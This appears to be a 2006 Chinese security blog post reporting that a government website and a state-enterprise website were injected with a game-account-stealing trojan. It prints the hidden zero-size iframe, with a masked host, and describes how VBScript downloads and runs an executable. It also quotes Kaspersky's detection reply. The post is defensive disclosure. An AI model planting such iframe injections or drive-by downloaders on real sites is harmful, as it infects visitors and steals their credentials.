[10-01]某政府和某中央企业网站被挂的木马升级了(第2版)

endurer　原创
2006-10-01　 第2版 补充 Kaspersky的回复。
2006-09-30　 第1版
 
上回发现这两个网站被挂上魔兽网游盗号木马。
 
如今网站首页被加入的代码变为：
/------------
＜iframe height=0 width=0 src="hxxp://***object***.cnicb*.com/1**5"＞＜/iframe＞
------------/
 
hxxp://***object***.cnicb*.com/1**5      的内容为加入多余空格的VBScript脚本代码。
该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object**.cnicb*.com/1***5/s***.exe，保存为 %temp%/test.exe，并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

test.exe             长度为 58,412 字节。

主　题：	RE: test.exe [KLAB-1256458]
发件人：	"" <newvirus@kaspersky.com>	发送时间：2006-09-30 20:52:16
收件人：	"" <endurer@163.com>

Hello, thank you, detected as Trojan-PSW.Win32.OnLineGames.m

Detection will be added to the next update.
--
Best regards, Shvetsov Dmitry
Virus analyst, Kaspersky Lab.

e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/